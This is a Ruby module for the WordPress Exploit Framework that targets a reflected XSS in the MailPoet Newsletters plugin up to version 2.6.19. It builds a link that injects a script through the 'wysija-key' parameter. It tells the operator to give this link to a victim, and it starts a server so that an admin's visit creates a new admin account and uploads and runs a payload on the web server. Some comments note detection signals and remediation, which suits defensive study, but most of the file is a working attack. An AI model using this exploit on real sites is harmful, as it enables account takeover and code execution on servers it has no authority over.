# frozen_string_literal: true

# WPXF module for the reflected XSS in the MailPoet Newsletters
# (wysija-newsletters) WordPress plugin, tracked as WPVDB 8373.
#
# The module title lists versions <= 2.6.19 as affected, and #check compares
# the plugin readme version against 2.7 (presumably the first fixed release;
# confirm against the referenced advisory). Upgrading the plugin to that
# release or later is the remediation this module implies.
#
# Detection: the generated link is a request carrying `controller=confirm`,
# `action=unsubscribe` and a `wysija-key` value that contains quote and
# tag-closing characters followed by a <script> element. A legitimate
# `wysija-key` value would not be expected to contain markup, so access-log
# or WAF matching on markup inside that parameter is a reasonable signal.
class Wpxf::Exploit::MailpoetNewslettersReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::Xss

  # Registers the module metadata (name, description, credits, references and
  # disclosure date) after the parent initialiser has run.
  def initialize
    super

    update_info(
      name: 'MailPoet Newsletters <= 2.6.19 Reflected XSS Shell Upload',
      desc: 'This module prepares a payload and link that can be sent to an admin user ' \
            'which when visited with a valid session will create a new admin user ' \
            'which will be used to upload and execute the selected payload in the ' \
            'context of the web server.',
      author: [
        'Netsparker', # Discovery and disclosure
        'rastating'   # WPXF module
      ],
      references: [
        %w[WPVDB 8373],
        ['URL', 'https://www.netsparker.com/ns-16-002-xss-vulnerability-identified-in-mailpoet-newsletters/']
      ],
      date: 'Feb 02 2016'
    )
  end

  # Version check based on the plugin's readme: delegates to
  # check_plugin_version_from_readme for the 'wysija-newsletters' slug with
  # '2.7' as the comparison version and returns whatever that helper returns.
  def check
    check_plugin_version_from_readme('wysija-newsletters', '2.7')
  end

  # Builds the link that reflects markup through the `wysija-key` query
  # parameter. The value first closes any quoted attribute, HTML comment,
  # <style> or <script> context it may land in, then adds a <script> element
  # whose body comes from xss_ascii_encoded_include_script (defined outside
  # this class, presumably by the Wpxf::WordPress::Xss mixin).
  #
  # @return [String] the target URI with the crafted query string appended
  def url_with_xss
    base = full_uri
    script_element = "<script>#{xss_ascii_encoded_include_script}</script>"

    [
      "#{base}?wysija-page=1&controller=confirm&wysija-key=",
      "'\"--></style></script>",
      script_element,
      '&action=unsubscribe&demo=1&wysijap=subscriptions'
    ].join
  end

  # Prints the crafted link for the operator and then starts the module's
  # HTTP server. @success is reset to false beforehand and returned afterwards;
  # nothing in this class sets it to true, so that presumably happens in the
  # request handlers supplied by the mixin (verify there).
  #
  # @return [Boolean] false when the parent #run fails, otherwise @success
  def run
    return false unless super

    @success = false
    emit_info 'Provide the URL below to the victim to begin the payload upload'

    # Surround the link with blank lines so it stands out in console output.
    puts
    puts url_with_xss
    puts

    start_http_server
    @success
  end
end
